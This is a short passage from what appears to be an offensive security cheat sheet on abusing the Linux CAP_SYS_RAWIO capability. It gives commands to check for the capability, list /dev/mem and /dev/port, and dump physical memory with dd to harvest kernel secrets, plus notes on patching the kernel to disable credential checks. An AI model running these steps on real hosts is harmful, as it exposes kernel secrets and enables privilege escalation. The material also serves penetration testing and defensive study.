CAP_SYS_RAWIO permits raw I/O: iopl/ioperm port access and reads and writes of physical memory devices like /dev/mem and /dev/port when they are present. That is a direct window into kernel memory, which can be read for secrets and KASLR, or written to patch kernel structures.
capsh --print | grep -q cap_sys_rawio && echo have
ls -l /dev/mem /dev/port 2>/dev/null
# Read physical memory for kernel structures / secrets
dd if=/dev/mem bs=1M count=16 2>/dev/null | strings | head
Exploitation notes#
- The capability is only as useful as the exposed devices: a privileged container has
/dev/mem; otherwise it must be granted with--device. - Writing
/dev/memto patch the kernel (for example disabling a credential check) is powerful but fragile across kernel versions; reads for a kernel exploit are more portable. - Related device routes are under Kernel memory devices.